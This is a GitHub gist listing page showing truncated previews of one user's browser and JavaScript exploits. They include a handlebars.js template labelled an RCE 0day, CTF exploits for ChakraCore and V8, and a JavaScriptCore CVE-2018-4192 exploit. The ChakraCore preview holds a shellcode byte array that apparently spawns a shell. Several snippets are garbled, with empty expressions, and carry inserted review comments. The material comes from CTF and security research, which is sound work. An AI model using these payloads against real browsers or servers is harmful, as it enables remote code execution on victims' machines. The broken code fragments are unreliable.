
Amy itszn

itszn / solve1.html
Last active Nov 8, 2019
Easiest Crackme Solution
<iframe src="" id="a"></iframe>
let i=0;
window.addEventListener("message", function(event) {
msg =;
console.log("attacker got ",msg);
if ( == 0) {
a.contentWindow.postMessage({type:'run', id: i++, from:'page'},'*');
} else if ( == 1) {
itszn / 0day.handlebars
Created Sep 16, 2019
handlebars.js rce 0day
//First we want to create an array
{{#with "a" as |str|}}
{{#with split as |list|}}
//Store some function that returns a truthy value into the array
//We use arrays to hold functions because handlebars will call functions
{{this.push this.toString}}
itszn / exploit.js
Last active Sep 18, 2019
Trendmicro CTF ChakraCore exploit
// NOTE(review): `sc` is a flat list of byte values (each 0-255). The name suggests a
// native-code payload, but nothing in this preview shows where it is consumed; confirm
// against the full file before drawing conclusions about what it does.
let sc = [106,104,72,184,47,98,105,110,47,47,47,115,80,72,137,231,104,114,105,1,1,129,52,36,1,1,1,1,49,246,86,106,8,94,72,1,230,86,72,137,230,49,210,106,59,88,15,5];
// One shared 8-byte buffer with two typed-array views over the same storage:
// a value written as two 32-bit words through `convi` can be read back as a
// single 64-bit float through `convf`. No numeric conversion takes place; the
// bit pattern is reinterpreted. Which word is the low half depends on the
// platform's byte order, because typed arrays use native endianness.
let conva = new ArrayBuffer(8)
let convi = new Uint32Array(conva);
let convf = new Float64Array(conva);
function i2f(i) {
convi[0] = i%0x100000000;
convi[1] = i/0x100000000;
return convf[0];
itszn / jquery-latest.js
Created Jun 19, 2019
Twitter Tag Challenge
/*! jQuery v3.4.1 | (c) JS Foundation and other contributors | */
!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],E=C.document,r=Object.getPrototypeOf,s=t.slice,g=t.concat,u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,,y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[]||"object":typeof e}var f="3.4.1",k=function(e,
itszn / exploit.js
Created Jul 11, 2018
Exploit for JavascriptCore CVE-2018-4192
// Load Int library, thanks saelo!
// Helpers to convert from float to int in a few random places
// A single 8-byte scratch buffer shared by three typed-array views, so the same
// 64 bits can be read or written as one double, two 32-bit words, or eight bytes.
// The views alias the same storage: a write through one is immediately visible
// through the others as a raw bit pattern, with no numeric conversion.
var conva = new ArrayBuffer(8);
var convf = new Float64Array(conva);   // the 8 bytes as one 64-bit float
var convi = new Uint32Array(conva);    // the 8 bytes as two 32-bit words (native byte order)
var convi8 = new Uint8Array(conva);    // the 8 bytes individually
itszn / d8.js
Last active Sep 8, 2019
Plaid CTF 2018 d8 exploit
/* Plaid CTF 2018 v8 Exploit. Exploit begins around line 240 */
/* ### Utils, thanks saelo ### */
// Tiny module that provides big (64bit) integers.
// Copyright (c) 2016 Samuel Groß
View gist:0eaac8657401d08f3b9d25ffc87875d7
itszn / exploit.html
Last active Sep 8, 2019
34c3ctf V9 Exploit
/**
 * Allocates sixteen 16 MiB ArrayBuffers one after another, keeping no reference
 * to any of them, and returns nothing.
 *
 * NOTE(review): judging by the name, the intent is presumably to create enough
 * allocation pressure that the engine runs a garbage collection. Whether a
 * collection actually happens is engine-dependent and not shown here.
 */
function gc() {
  const rounds = 0x10;
  const chunkBytes = 0x1000000;
  let done = 0;
  while (done < rounds) {
    // The buffer is dropped immediately; only the allocation itself matters.
    new ArrayBuffer(chunkBytes);
    done += 1;
  }
}
var sc = [];
for (var i=0; i<0x480; i++) {
itszn /
Created Oct 16, 2017
Binary Ninja subleq plugin
from binaryninja import (Architecture, RegisterInfo, InstructionInfo,
InstructionTextToken, InstructionTextTokenType, InstructionTextTokenContext,
LowLevelILOperation, LLIL_TEMP,

Keybase proof

I hereby claim:

  • I am itszn on github.
  • I am itszn on keybase.
  • I have a public key ASAk2FcK4Zc6VAbULYP0m6uMVMTTBV1Cjr5QEL-4YsLlzgo

To claim this, I am signing this object:
